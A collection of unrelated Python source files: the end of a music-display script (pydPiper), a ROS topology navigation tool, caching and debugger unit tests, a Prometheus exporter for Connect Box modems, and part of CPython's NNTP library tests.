print ('pydPiper.py -d <driver> --devicetype <devicetype e.g. ssd1306, sh1106> --width <width in pixels> --height <height in pixels> --rs <rs> --e <e> --d4 <d4> --d5 <d5> --d6 <d6> --d7 <d7> --i2caddress <i2c address> --i2cport <i2c port> --enable <enable duration> --wapi <weather underground api key> --wlocale <weather location> --timezone <timezone> --temperature <fahrenheit or celsius> --mpd --spop --lms --rune --volumio --pages <pagefile> --lmsplayer <mac address of lms player> --showupdates')
sys.exit()
elif opt in ("-d", "--driver"):
driver = arg
elif opt in ("--devicetype"):
devicetype = arg
elif opt in ("--rs"):
pin_rs = int(arg)
elif opt in ("--e"):
pin_e = int(arg)
elif opt in ("--d4"):
pin_d4 = int(arg)
elif opt in ("--d5"):
pin_d5 = int(arg)
elif opt in ("--d6"):
pin_d6 = int(arg)
elif opt in ("--d7"):
pin_d7 = int(arg)
elif opt in ("--i2caddress"):
i2c_address = int(arg,0)
elif opt in ("--i2cport"):
i2c_port = int(arg,0)
elif opt in ("--width"):
cols = int(arg,0)
elif opt in ("--height"):
rows = int(arg,0)
elif opt in ("--enable"):
enable = int(arg)
elif opt in ("--wapi"):
pydPiper_config.WUNDER_API = arg
elif opt in ("--wlocale"):
pydPiper_config.WUNDER_LOCATION = arg
elif opt in ("--timezone"):
pydPiper_config.TIMEZONE = arg
elif opt in (u"--time24hour"):
pydPiper_config.TIME24HOUR = True
elif opt in ("--temperature"):
pydPiper_config.TEMPERATURE = arg
elif opt in ("--mpd"):
services_list.append('mpd')
elif opt in ("--spop"):
services_list.append('spop')
elif opt in ("--lms"):
services_list.append('lms')
elif opt in ("--lmsplayer"):
pydPiper_config.LMS_PLAYER = arg
elif opt in ("--rune"):
services_list.append('rune')
elif opt in ("--volumio"):
services_list.append('volumio')
elif opt in ("--pages"):
pagefile = arg
# print u"Loading {0} as page file".format(arg)
# If page file provided, try to load provided file on top of default pages file
# try:
# newpages = imp.load_source(u'pages', arg)
# if validpages(newpages):
# pages = newpages
# else:
# print u"Invalid page file provided. Using default pages."
# except IOError:
# # Page file not found
# print u"Page file {0} not found. Using default pages".format(arg)
elif opt in ("--showupdates"):
showupdates = True
pydPiper_config.DISPLAY_SIZE = (cols, rows)
pins_data = [pin_d4, pin_d5, pin_d6, pin_d7]
if len(services_list) == 0:
logging.critical("Must have at least one music service to monitor")
sys.exit()
logging.info('pydPiper starting')
dq = queue.Queue()
# Choose display
if not driver:
try:
driver = pydPiper_config.DISPLAY_DRIVER
except:
drvier = ''
if not devicetype:
try:
devicetype = pydPiper_config.DISPLAY_DEVICETYPE
except:
devicetype = ''
if driver == "winstar_weg":
lcd = displays.winstar_weg.winstar_weg(rows, cols, pin_rs, pin_e, pins_data, enable)
elif driver == "hd44780":
lcd = displays.hd44780.hd44780(rows, cols, pin_rs, pin_e, pins_data, enable)
elif driver == "hd44780_i2c":
lcd = displays.hd44780_i2c.hd44780_i2c(rows, cols, i2c_address, i2c_port, enable)
elif driver == "hd44780_mcp23008":
lcd = displays.hd44780_i2c.hd44780_mcp23008(rows, cols, i2c_address, i2c_port, enable)
elif driver == "ssd1306_i2c":
lcd = displays.ssd1306_i2c.ssd1306_i2c(rows, cols, i2c_address, i2c_port)
elif driver == "luma_i2c":
lcd = displays.luma_i2c.luma_i2c(rows, cols, i2c_address, i2c_port, devicetype)
elif driver == "lcd_curses":
lcd = displays.lcd_curses.lcd_curses(rows, cols)
else:
logging.critical("No valid display found")
sys.exit()
lcd.clear()
logging.debug('Loading display controller')
dc = displays.display.display_controller(pydPiper_config.DISPLAY_SIZE)
logging.debug('Loading music controller')
mc = music_controller(services_list, dc, showupdates)
time.sleep(2)
mc.start()
dc.load(pagefile, mc.musicdata,mc.musicdata_prev )
try:
while True:
# Get next image and send it to the display every .1 seconds
with mc.musicdata_lock:
img = next(dc)
# displays.graphics.update(img)
lcd.update(img)
time.sleep(pydPiper_config.ANIMATION_SMOOTHING)
except KeyboardInterrupt:
pass
finally:
print ("Shutting down threads")
exitapp[0] = True
try:
lcd.clear()
lcd.message("Exiting...")
time.sleep(3)
lcd.clear()
lcd.cleanup()
except:
pass
mc.join()
logging.info("Exiting...")
|
topologyGoal.py
|
# Copyright 2021 CLOBOT Co. Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import rospy
from geometry_msgs.msg import PointStamped,Point
from geometry_msgs.msg import PoseWithCovarianceStamped
from geometry_msgs.msg import PoseStamped
from rospkg.rospack import RosPack
from visualization_msgs.msg import Marker, MarkerArray
from clobot_msgs.msg import NavigationStatus
from tf.transformations import euler_from_quaternion, quaternion_from_euler
import json
import threading
import sys
import math
class TopologyGoal:
def __init__(self, f_name):
pack = RosPack()
self.nodefile = pack.get_path("clober_tools")+"/topology/"+f_name+".json"
self.topology = {"Map":"","Node":[],"Link":[]}
self.pose = [0]*3
self.cmdType = None
self.goalNode = None
self.goalList = None
self.goalIdx = 0
## publisher ##
self.goalPub = rospy.Publisher("/goal", PoseStamped, queue_size=1)
self.nodePub = rospy.Publisher('/topology/nodes', MarkerArray, queue_size=1)
self.linkPub = rospy.Publisher('/topology/links', MarkerArray, queue_size=1)
## subscriber ##
rospy.Subscriber("/cmb/status", NavigationStatus, self.navCB)
def sendGoal(self):
if self.cmdType == "node":
nodeId = self.goalNode
elif self.cmdType == "path":
if self.goalIdx >= len(self.goalList):
print("path navigation finished")
return
nodeId = self.goalList[self.goalIdx]
else:
print("cmdType is not defined")
return
goal = PoseStamped()
value = self.findTopologyIdx(nodeId)
if value == -1:
print("node Id : ",nodeId," not exist")
else:
goal.pose.position.x = self.topology["Node"][value]["Position"]["x"]
goal.pose.position.y = self.topology["Node"][value]["Position"]["y"]
if self.cmdType == "node":
goal.pose.orientation.x = self.topology["Node"][value]["Orientation"]["x"]
goal.pose.orientation.y = self.topology["Node"][value]["Orientation"]["y"]
goal.pose.orientation.z = self.topology["Node"][value]["Orientation"]["z"]
goal.pose.orientation.w = self.topology["Node"][value]["Orientation"]["w"]
elif self.cmdType == "path":
if self.goalIdx == len(self.goalList)-1:
goal.pose.orientation.x = self.topology["Node"][value]["Orientation"]["x"]
goal.pose.orientation.y = self.topology["Node"][value]["Orientation"]["y"]
goal.pose.orientation.z = self.topology["Node"][value]["Orientation"]["z"]
goal.pose.orientation.w = self.topology["Node"][value]["Orientation"]["w"]
else:
next_goal_id = self.goalList[self.goalIdx+1]
next_goal_idx = self.findTopologyIdx(next_goal_id)
next_goal_x = self.topology["Node"][next_goal_idx]["Position"]["x"]
next_goal_y = self.topology["Node"][next_goal_idx]["Position"]["y"]
yaw_rad = math.atan2(next_goal_y-goal.pose.position.y, next_goal_x-goal.pose.position.x)
quat = self.getQuaternion(0.0,0.0,yaw_rad)
goal.pose.orientation.x = qaut[0]
goal.pose.orientation.y = qaut[1]
goal.pose.orientation.z = qaut[2]
goal.pose.orientation.w = qaut[3]
else:
pass
self.goalPub.publish(goal)
print("send goal Id : ",nodeId)
return
def findTopologyIdx(self,nodeId):
for i in range(len(self.topology["Node"])):
if self.topology["Node"][i]["ID"] == nodeId:
return i
return -1
def getYaw(self,q):
q_list = [q.x,q.y,q.z,q.w]
(roll, pitch, yaw) = euler_from_quaternion(q_list)
return yaw
def getQuaternion(self,roll,pitch,yaw):
quat = quaternion_from_euler(roll,pitch,yaw)
return quat
def navCB(self,msg):
if msg.status == NavigationStatus.STATUS_REACHED:
if self.cmdType == "path":
print("send next goal")
self.goalIdx += 1
self.sendGoal()
def checkId(self,nodeId):
for i in range(len(self.topology["Node"])):
if self.topology["Node"][i]["ID"] == nodeId:
return True
return False
def getTopologyfromFile(self):
try:
print(self.nodefile)
with open(self.nodefile, "rt") as f:
self.topology = json.load(f)
print(self.nodefile +" is already exist... use it!")
except Exception as e:
print('new file is created ', e)
def setTopologyToFile(self):
try:
with open(self.nodefile, "wt") as f:
json.dump(self.topology, f, indent=4)
except Exception as e:
print('error')
def jsonload(self):
self.getTopologyfromFile()
def showNode(self):
self.getTopologyfromFile()
markerArray = MarkerArray()
for i in range(len(self.topology["Node"])):
marker = Marker()
marker.header.frame_id = 'map'
marker.header.stamp = rospy.Time()
marker.id = i
marker.type = marker.SPHERE
marker.action = marker.ADD
marker.pose.position.x = self.topology["Node"][i]["Position"]["x"]
marker.pose.position.y = self.topology["Node"][i]["Position"]["y"]
marker.scale.x = 0.2
marker.scale.y = 0.2
marker.scale.z = 0.2
marker.color.a = 1.0
marker.color.r = 1.0
marker.color.g = 0.0
marker.color.b = 0.0
name_marker = Marker()
name_marker.header.frame_id = 'map'
name_marker.header.stamp = rospy.Time()
name_marker.id = i+2000
name_marker.type = Marker.TEXT_VIEW_FACING
name_marker.scale.z = 0.3
name_marker.text = self.topology["Node"][i]["ID"]
name_marker.color.a = 1.0
name_marker.color.r = 0.0
name_marker.color.g = 0.0
name_marker.color.b = 0.0
name_marker.pose.position.x = self.topology["Node"][i]["Position"]["x"]+0.3
name_marker.pose.position.y = self.topology["Node"][i]["Position"]["y"]+0.3
markerArray.markers.append(marker)
markerArray.markers.append(name_marker)
self.nodePub.publish(markerArray)
def showLink(self):
self.getTopologyfromFile()
markerArray = MarkerArray()
for i in range(len(self.topology["Link"])):
marker = Marker()
s_node = self.topology["Link"][i]["Connected"][0]
e_node = self.topology["Link"][i]["Connected"][1]
print(s_node)
print(e_node)
start_point = Point()
for j in range(len(self.topology["Node"])):
if s_node == self.topology["Node"][j]["ID"] :
start_point.x = self.topology["Node"][j]["Position"]["x"]
start_point.y = self.topology["Node"][j]["Position"]["y"]
break
end_point = Point()
for j in range(len(self.topology["Node"])):
if e_node == self.topology["Node"][j]["ID"] :
end_point.x = self.topology["Node"][j]["Position"]["x"]
end_point.y = self.topology["Node"][j]["Position"]["y"]
break
marker.header.frame_id = 'map'
marker.id = i
marker.type = marker.LINE_STRIP
marker.scale.x = 0.1
marker.scale.y = 0.1
marker.scale.z = 0.1
marker.points.append(start_point)
marker.points.append(end_point)
marker.color.a = 1.0
marker.color.r = 0.0
marker.color.g = 0.0
marker.color.b = 1.0
name_marker = Marker()
name_marker.header.frame_id = 'map'
name_marker.header.stamp = rospy.Time()
name_marker.id = i+2000
name_marker.type = Marker.TEXT_VIEW_FACING
name_marker.scale.z = 0.3
name_marker.text = self.topology["Link"][i]["ID"]
name_marker.color.a = 1.0
name_marker.color.r = 0.0
name_marker.color.g = 0.0
name_marker.color.b = 0.0
name_marker.pose.position.x = (start_point.x+end_point.x)/2 - 0.4
name_marker.pose.position.y = (start_point.y+end_point.y)/2
markerArray.markers.append(marker)
markerArray.markers.append(name_marker)
self.linkPub.publish(markerArray)
def main(filename):
try:
rospy.init_node("topology_goal_node", anonymous=True)
writer = TopologyGoal(filename)
t = threading.Thread(target=rospy.spin)
t.setDaemon(True)
t.start
""" print usage """
print("*********** Use key input ***********")
print("q : quit")
print("load : load file")
print("node : set goal from topology nodes")
print("path : set path from topology nodes")
print("go : send goal by node or path")
print("v : show nodes")
print("*******************")
while not rospy.is_shutdown():
try:
cmd = input("input : ")
if cmd == 'q':
break
elif cmd == 'node':
name = input("node name : ")
writer.cmdType = 'node'
if writer.checkId(name):
writer.goalNode = name
print("set goal node : ",name)
elif cmd == 'path':
path = []
writer.cmdType = 'path'
writer.goalIdx = 0
while True:
name = input("path node name (press 'f' if finish) : ")
if writer.checkId(name):
path.append(name)
print("set goal path : ",path)
if name == 'f':
break
writer.goalList = path
elif cmd == 'go':
writer.sendGoal()
elif cmd == 'load':
writer.jsonload()
elif cmd == 'v':
writer.showNode()
writer.showLink()
except ValueError:
print("value error")
except KeyboardInterrupt:
print("shutting down")
if __name__ == "__main__":
if len(sys.argv) != 2 :
print("use... 'python topologyWriter.py filename'")
exit(0)
main(sys.argv[1])
|
test_caching.py
|
#!usr/bin/env python3
import threading
import time
from typing import Optional
import pytest
from anchore_engine.subsys.caching import (
TTLCache,
local_named_cache,
thread_local_cache,
)
@pytest.fixture
def ttl_cache(request):
cache: TTLCache = TTLCache()
value: str = "test_value"
cache.cache_it("test_key", value, request.param)
return cache
class TestTTLCache:
@pytest.mark.parametrize(
"ttl_cache, sleep_time, expected_type",
[
(None, 0, str),
(-1, 0, str),
(1, 1, type(None)),
(0, 0, type(None)),
],
indirect=["ttl_cache"],
)
def test_cache(self, ttl_cache, sleep_time, expected_type):
time.sleep(sleep_time)
cached: Optional[str] = ttl_cache.lookup("test_key")
assert isinstance(cached, expected_type)
if expected_type != type(None):
assert id(cached) == id("test_value")
@pytest.mark.parametrize("ttl_cache", [(None)], indirect=["ttl_cache"])
def test_cache_flush(self, ttl_cache):
ttl_cache.flush()
cached: Optional[str] = ttl_cache.lookup("test_key")
assert isinstance(cached, type(None))
@pytest.mark.parametrize("ttl_cache", [(None)], indirect=["ttl_cache"])
def test_cache_delete(self, ttl_cache):
ttl_cache.delete("test_key")
cached: Optional[str] = ttl_cache.lookup("test_key")
assert isinstance(cached, type(None))
class TestLocalCaches:
def test_threadlocal_singleton(self):
cache: threading.local = thread_local_cache()
cache2: threading.local = thread_local_cache()
assert id(cache) == id(cache2)
def test_threadlocal_has_cache(self):
cache: threading.local = thread_local_cache()
assert hasattr(cache, "general")
assert isinstance(cache.general, TTLCache)
def test_localnamed_has_name(self):
cache: TTLCache = local_named_cache("mycache")
tlocal: threading.local = thread_local_cache()
assert isinstance(cache, TTLCache)
assert hasattr(tlocal, "mycache")
def test_threadlocal_is_thread_local(self):
thread_cache_id: Optional[int] = None
def thread_func():
nonlocal thread_cache_id
thread_cache_id = id(thread_local_cache().general)
t1: threading.Thread = threading.Thread(target=thread_func)
t1.start()
t1.join()
main_cache_id: int = id(thread_local_cache().general)
assert main_cache_id != thread_cache_id
|
test_frame_evaluator.py
|
import sys
import threading
import pytest
from pydev_tests_python.debugger_unittest import IS_PY36_OR_GREATER, IS_CPYTHON
from pydev_tests_python.debug_constants import TEST_CYTHON
pytestmark = pytest.mark.skipif(not IS_PY36_OR_GREATER or not IS_CPYTHON or not TEST_CYTHON, reason='Requires CPython >= 3.6')
def get_foo_frame():
frame = sys._getframe()
return frame
class CheckClass(object):
def collect_info(self):
from _pydevd_frame_eval import pydevd_frame_evaluator
thread_info = pydevd_frame_evaluator.get_thread_info_py()
self.thread_info = thread_info
@pytest.mark.parametrize('_times', range(2))
def test_thread_info(_times):
obj = CheckClass()
obj.collect_info()
assert obj.thread_info.additional_info is not None
assert not obj.thread_info.is_pydevd_thread
thread_info = obj.thread_info
obj.collect_info()
assert obj.thread_info is thread_info
obj = CheckClass()
t = threading.Thread(target=obj.collect_info)
t.is_pydev_daemon_thread = True
t.start()
t.join()
assert obj.thread_info.additional_info is None
assert obj.thread_info.is_pydevd_thread
def method():
pass
@pytest.fixture
def _custom_global_dbg():
from _pydevd_bundle.pydevd_constants import GlobalDebuggerHolder
from pydevd import PyDB
curr = GlobalDebuggerHolder.global_dbg
PyDB() # Will make itself current
yield
GlobalDebuggerHolder.global_dbg = curr
@pytest.mark.parametrize('_times', range(2))
def test_func_code_info(_times, _custom_global_dbg):
from _pydevd_frame_eval import pydevd_frame_evaluator
# Must be called before get_func_code_info_py to initialize the _code_extra_index.
pydevd_frame_evaluator.get_thread_info_py()
func_info = pydevd_frame_evaluator.get_func_code_info_py(method.__code__)
assert func_info.co_filename is method.__code__.co_filename
func_info2 = pydevd_frame_evaluator.get_func_code_info_py(method.__code__)
assert func_info is func_info2
some_func = eval('lambda:0')
func_info3 = pydevd_frame_evaluator.get_func_code_info_py(some_func.__code__)
del some_func
del func_info3
some_func = eval('lambda:0')
pydevd_frame_evaluator.get_func_code_info_py(some_func.__code__)
func_info = pydevd_frame_evaluator.get_func_code_info_py(some_func.__code__)
assert pydevd_frame_evaluator.get_func_code_info_py(some_func.__code__) is func_info
|
connectbox_exporter.py
|
import json
import logging
import threading
import time
from http.server import HTTPServer
from socketserver import ThreadingMixIn
from typing import Dict
import click
import compal
from lxml.etree import XMLSyntaxError
from prometheus_client import CollectorRegistry, MetricsHandler
from prometheus_client.metrics_core import GaugeMetricFamily
from requests import Timeout
from connectbox_exporter.config import (
load_config,
IP_ADDRESS,
PASSWORD,
EXPORTER,
PORT,
TIMEOUT_SECONDS,
EXTRACTORS,
)
from connectbox_exporter.logger import get_logger, VerboseLogger
from connectbox_exporter.xml2metric import get_metrics_extractor
# Taken 1:1 from prometheus-client==0.7.1, see https://github.com/prometheus/client_python/blob/3cb4c9247f3f08dfbe650b6bdf1f53aa5f6683c1/prometheus_client/exposition.py
class _ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
"""Thread per request HTTP server."""
# Make worker threads "fire and forget". Beginning with Python 3.7 this
# prevents a memory leak because ``ThreadingMixIn`` starts to gather all
# non-daemon threads in a list in order to join on them at server close.
# Enabling daemon threads virtually makes ``_ThreadingSimpleServer`` the
# same as Python 3.7's ``ThreadingHTTPServer``.
daemon_threads = True
class ConnectBoxCollector(object):
def __init__(
self,
logger: VerboseLogger,
ip_address: str,
password: str,
exporter_config: Dict,
):
self.logger = logger
self.ip_address = ip_address
self.password = password
self.timeout = exporter_config[TIMEOUT_SECONDS]
extractors = exporter_config[EXTRACTORS]
self.metric_extractors = [get_metrics_extractor(e, logger) for e in extractors]
def collect(self):
# Collect scrape duration and scrape success for each extractor. Scrape success is initialized with False for
# all extractors so that we can report a value for each extractor even in cases where we abort midway through
# because we lost connection to the modem.
scrape_duration = {} # type: Dict[str, float]
scrape_success = {e.name: False for e in self.metric_extractors}
# attempt login
login_logout_success = True
try:
self.logger.debug("Logging in at " + self.ip_address)
connectbox = compal.Compal(
self.ip_address, key=self.password, timeout=self.timeout
)
connectbox.login()
except (ConnectionError, Timeout, ValueError) as e:
self.logger.error(repr(e))
connectbox = None
login_logout_success = False
# skip extracting further metrics if login failed
if connectbox is not None:
for extractor in self.metric_extractors:
raw_xmls = {}
try:
pre_scrape_time = time.time()
# obtain all raw XML responses for an extractor, then extract metrics
for fun in extractor.functions:
self.logger.debug(f"Querying fun={fun}...")
raw_xml = connectbox.xml_getter(fun, {}).content
self.logger.verbose(
f"Raw XML response for fun={fun}:\n{raw_xml.decode()}"
)
raw_xmls[fun] = raw_xml
yield from extractor.extract(raw_xmls)
post_scrape_time = time.time()
scrape_duration[extractor.name] = post_scrape_time - pre_scrape_time
scrape_success[extractor.name] = True
except (XMLSyntaxError, AttributeError) as e:
# in case of a less serious error, log and continue scraping the next extractor
jsonized = json.dumps(raw_xmls)
message = f"Failed to extract '{extractor.name}'. Please open an issue on Github and include the following:\n{repr(e)}\n{jsonized}"
self.logger.error(message)
except (ConnectionError, Timeout) as e:
# in case of serious connection issues, abort and do not try the next extractor
self.logger.error(repr(e))
break
# attempt logout once done
try:
self.logger.debug("Logging out.")
connectbox.logout()
except Exception as e:
self.logger.error(e)
login_logout_success = False
scrape_success["login_logout"] = int(login_logout_success)
# create metrics from previously durations and successes collected
EXTRACTOR = "extractor"
scrape_duration_metric = GaugeMetricFamily(
"connectbox_scrape_duration",
documentation="Scrape duration by extractor",
unit="seconds",
labels=[EXTRACTOR],
)
for name, duration in scrape_duration.items():
scrape_duration_metric.add_metric([name], duration)
yield scrape_duration_metric
scrape_success_metric = GaugeMetricFamily(
"connectbox_up",
documentation="Connect Box exporter scrape success by extractor",
labels=[EXTRACTOR],
)
for name, success in scrape_success.items():
scrape_success_metric.add_metric([name], int(success))
yield scrape_success_metric
@click.command()
@click.argument("config_file", type=click.Path(exists=True, dir_okay=False))
@click.option(
"-v",
"--verbose",
help="Log more messages. Multiple -v increase verbosity.",
count=True,
)
def main(config_file, verbose):
"""
Launch the exporter using a YAML config file.
"""
# hush the logger from the compal library and use our own custom logger
compal.LOGGER.setLevel(logging.WARNING)
logger = get_logger(verbose)
# load user and merge with defaults
config = load_config(config_file)
exporter_config = config[EXPORTER]
# fire up collector
reg = CollectorRegistry()
reg.register(
ConnectBoxCollector(
logger,
ip_address=config[IP_ADDRESS],
password=config[PASSWORD],
exporter_config=config[EXPORTER],
)
)
# start http server
CustomMetricsHandler = MetricsHandler.factory(reg)
httpd = _ThreadingSimpleServer(("", exporter_config[PORT]), CustomMetricsHandler)
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.start()
logger.info(
f"Exporter running at http://localhost:{exporter_config[PORT]}, querying {config[IP_ADDRESS]}"
)
# wait indefinitely
try:
while True:
time.sleep(3)
except KeyboardInterrupt:
httpd.shutdown()
httpd_thread.join()
|
test_nntplib.py
|
import io
import socket
import datetime
import textwrap
import unittest
import functools
import contextlib
import os.path
import re
import threading
from test import support
from nntplib import NNTP, GroupInfo
import nntplib
from unittest.mock import patch
try:
import ssl
except ImportError:
ssl = None
TIMEOUT = 30
certfile = os.path.join(os.path.dirname(__file__), 'keycert3.pem')
if ssl is not None:
SSLError = ssl.SSLError
else:
class SSLError(Exception):
"""Non-existent exception class when we lack SSL support."""
reason = "This will never be raised."
# TODO:
# - test the `file` arg to more commands
# - test error conditions
# - test auth and `usenetrc`
class NetworkedNNTPTestsMixin:
def test_welcome(self):
welcome = self.server.getwelcome()
self.assertEqual(str, type(welcome))
def test_help(self):
resp, lines = self.server.help()
self.assertTrue(resp.startswith("100 "), resp)
for line in lines:
self.assertEqual(str, type(line))
def test_list(self):
resp, groups = self.server.list()
if len(groups) > 0:
self.assertEqual(GroupInfo, type(groups[0]))
self.assertEqual(str, type(groups[0].group))
def test_list_active(self):
resp, groups = self.server.list(self.GROUP_PAT)
if len(groups) > 0:
self.assertEqual(GroupInfo, type(groups[0]))
self.assertEqual(str, type(groups[0].group))
def test_unknown_command(self):
with self.assertRaises(nntplib.NNTPPermanentError) as cm:
self.server._shortcmd("XYZZY")
resp = cm.exception.response
self.assertTrue(resp.startswith("500 "), resp)
def test_newgroups(self):
# gmane gets a constant influx of new groups. In order not to stress
# the server too much, we choose a recent date in the past.
dt = datetime.date.today() - datetime.timedelta(days=7)
resp, groups = self.server.newgroups(dt)
if len(groups) > 0:
self.assertIsInstance(groups[0], GroupInfo)
self.assertIsInstance(groups[0].group, str)
def test_description(self):
def _check_desc(desc):
# Sanity checks
self.assertIsInstance(desc, str)
self.assertNotIn(self.GROUP_NAME, desc)
desc = self.server.description(self.GROUP_NAME)
_check_desc(desc)
# Another sanity check
self.assertIn("Python", desc)
# With a pattern
desc = self.server.description(self.GROUP_PAT)
_check_desc(desc)
# Shouldn't exist
desc = self.server.description("zk.brrtt.baz")
self.assertEqual(desc, '')
def test_descriptions(self):
resp, descs = self.server.descriptions(self.GROUP_PAT)
# 215 for LIST NEWSGROUPS, 282 for XGTITLE
self.assertTrue(
resp.startswith("215 ") or resp.startswith("282 "), resp)
self.assertIsInstance(descs, dict)
desc = descs[self.GROUP_NAME]
self.assertEqual(desc, self.server.description(self.GROUP_NAME))
def test_group(self):
result = self.server.group(self.GROUP_NAME)
self.assertEqual(5, len(result))
resp, count, first, last, group = result
self.assertEqual(group, self.GROUP_NAME)
self.assertIsInstance(count, int)
self.assertIsInstance(first, int)
self.assertIsInstance(last, int)
self.assertLessEqual(first, last)
self.assertTrue(resp.startswith("211 "), resp)
def test_date(self):
resp, date = self.server.date()
self.assertIsInstance(date, datetime.datetime)
# Sanity check
self.assertGreaterEqual(date.year, 1995)
self.assertLessEqual(date.year, 2030)
def _check_art_dict(self, art_dict):
# Some sanity checks for a field dictionary returned by OVER / XOVER
self.assertIsInstance(art_dict, dict)
# NNTP has 7 mandatory fields
self.assertGreaterEqual(art_dict.keys(),
{"subject", "from", "date", "message-id",
"references", ":bytes", ":lines"}
)
for v in art_dict.values():
self.assertIsInstance(v, (str, type(None)))
def test_xover(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
resp, lines = self.server.xover(last - 5, last)
if len(lines) == 0:
self.skipTest("no articles retrieved")
# The 'last' article is not necessarily part of the output (cancelled?)
art_num, art_dict = lines[0]
self.assertGreaterEqual(art_num, last - 5)
self.assertLessEqual(art_num, last)
self._check_art_dict(art_dict)
@unittest.skipIf(True, 'temporarily skipped until a permanent solution'
' is found for issue #28971')
def test_over(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
start = last - 10
# The "start-" article range form
resp, lines = self.server.over((start, None))
art_num, art_dict = lines[0]
self._check_art_dict(art_dict)
# The "start-end" article range form
resp, lines = self.server.over((start, last))
art_num, art_dict = lines[-1]
# The 'last' article is not necessarily part of the output (cancelled?)
self.assertGreaterEqual(art_num, start)
self.assertLessEqual(art_num, last)
self._check_art_dict(art_dict)
# XXX The "message_id" form is unsupported by gmane
# 503 Overview by message-ID unsupported
def test_xhdr(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
resp, lines = self.server.xhdr('subject', last)
for line in lines:
self.assertEqual(str, type(line[1]))
def check_article_resp(self, resp, article, art_num=None):
self.assertIsInstance(article, nntplib.ArticleInfo)
if art_num is not None:
self.assertEqual(article.number, art_num)
for line in article.lines:
self.assertIsInstance(line, bytes)
# XXX this could exceptionally happen...
self.assertNotIn(article.lines[-1], (b".", b".\n", b".\r\n"))
@unittest.skipIf(True, "FIXME: see bpo-32128")
def test_article_head_body(self):
resp, count, first, last, name = self.server.group(self.GROUP_NAME)
# Try to find an available article
for art_num in (last, first, last - 1):
try:
resp, head = self.server.head(art_num)
except nntplib.NNTPTemporaryError as e:
if not e.response.startswith("423 "):
raise
# "423 No such article" => choose another one
continue
break
else:
self.skipTest("could not find a suitable article number")
self.assertTrue(resp.startswith("221 "), resp)
self.check_article_resp(resp, head, art_num)
resp, body = self.server.body(art_num)
self.assertTrue(resp.startswith("222 "), resp)
self.check_article_resp(resp, body, art_num)
resp, article = self.server.article(art_num)
self.assertTrue(resp.startswith("220 "), resp)
self.check_article_resp(resp, article, art_num)
# Tolerate running the tests from behind a NNTP virus checker
blacklist = lambda line: line.startswith(b'X-Antivirus')
filtered_head_lines = [line for line in head.lines
if not blacklist(line)]
filtered_lines = [line for line in article.lines
if not blacklist(line)]
self.assertEqual(filtered_lines, filtered_head_lines + [b''] + body.lines)
def test_capabilities(self):
# The server under test implements NNTP version 2 and has a
# couple of well-known capabilities. Just sanity check that we
# got them.
def _check_caps(caps):
caps_list = caps['LIST']
self.assertIsInstance(caps_list, (list, tuple))
self.assertIn('OVERVIEW.FMT', caps_list)
self.assertGreaterEqual(self.server.nntp_version, 2)
_check_caps(self.server.getcapabilities())
# This re-emits the command
resp, caps = self.server.capabilities()
_check_caps(caps)
def test_zlogin(self):
# This test must be the penultimate because further commands will be
# refused.
baduser = "notarealuser"
badpw = "notarealpassword"
# Check that bogus credentials cause failure
self.assertRaises(nntplib.NNTPError, self.server.login,
user=baduser, password=badpw, usenetrc=False)
# FIXME: We should check that correct credentials succeed, but that
# would require valid details for some server somewhere to be in the
# test suite, I think. Gmane is anonymous, at least as used for the
# other tests.
def test_zzquit(self):
# This test must be called last, hence the name
cls = type(self)
try:
self.server.quit()
finally:
cls.server = None
@classmethod
def wrap_methods(cls):
# Wrap all methods in a transient_internet() exception catcher
# XXX put a generic version in test.support?
def wrap_meth(meth):
@functools.wraps(meth)
def wrapped(self):
with support.transient_internet(self.NNTP_HOST):
meth(self)
return wrapped
for name in dir(cls):
if not name.startswith('test_'):
continue
meth = getattr(cls, name)
if not callable(meth):
continue
# Need to use a closure so that meth remains bound to its current
# value
setattr(cls, name, wrap_meth(meth))
def test_with_statement(self):
def is_connected():
if not hasattr(server, 'file'):
return False
try:
server.help()
except (OSError, EOFError):
return False
return True
try:
with self.NNTP_CLASS(self.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) as server:
self.assertTrue(is_connected())
self.assertTrue(server.help())
self.assertFalse(is_connected())
with self.NNTP_CLASS(self.NNTP_HOST, timeout=TIMEOUT, usenetrc=False) as server:
server.quit()
self.assertFalse(is_connected())
except SSLError as ssl_err:
# matches "[SSL: DH_KEY_TOO_SMALL] dh key too small"
if re.search(r'(?i)KEY.TOO.SMALL', ssl_err.reason):
raise unittest.SkipTest(f"Got {ssl_err} connecting "
f"to {self.NNTP_HOST!r}")
raise
NetworkedNNTPTestsMixin.wrap_methods()
EOF_ERRORS = (EOFError,)
if ssl is not None:
EOF_ERRORS += (ssl.SSLEOFError,)
class NetworkedNNTPTests(NetworkedNNTPTestsMixin, unittest.TestCase):
# This server supports STARTTLS (gmane doesn't)
NNTP_HOST = 'news.trigofacile.com'
GROUP_NAME = 'fr.comp.lang.python'
GROUP_PAT = 'fr.comp.lang.*'
NNTP_CLASS = NNTP
@classmethod
def setUpClass(cls):
support.requires("network")
with support.transient_internet(cls.NNTP_HOST):
try:
cls.server = cls.NNTP_CLASS(cls.NNTP_HOST, timeout=TIMEOUT,
usenetrc=False)
except SSLError as ssl_err:
# matches "[SSL: DH_KEY_TOO_SMALL] dh key too small"
if re.search(r'(?i)KEY.TOO.SMALL', ssl_err.reason):
raise unittest.SkipTest(f"{cls} got {ssl_err} connecting "
f"to {cls.NNTP_HOST!r}")
raise
except EOF_ERRORS:
raise unittest.SkipTest(f"{cls} got EOF error on connecting "
f"to {cls.NNTP_HOST!r}")
@classmethod
def tearDownClass(cls):
if cls.server is not None:
cls.server.quit()
@unittest.skipUnless(ssl, 'requires SSL support')
class NetworkedNNTP_SSLTests(NetworkedNNTPTests):
# Technical limits for this public NNTP server (see http://www.aioe.org):
# "Only two concurrent connections per IP address are allowed and
# 400 connections per day are accepted from each IP address."
NNTP_HOST = 'nntp.aioe.org'
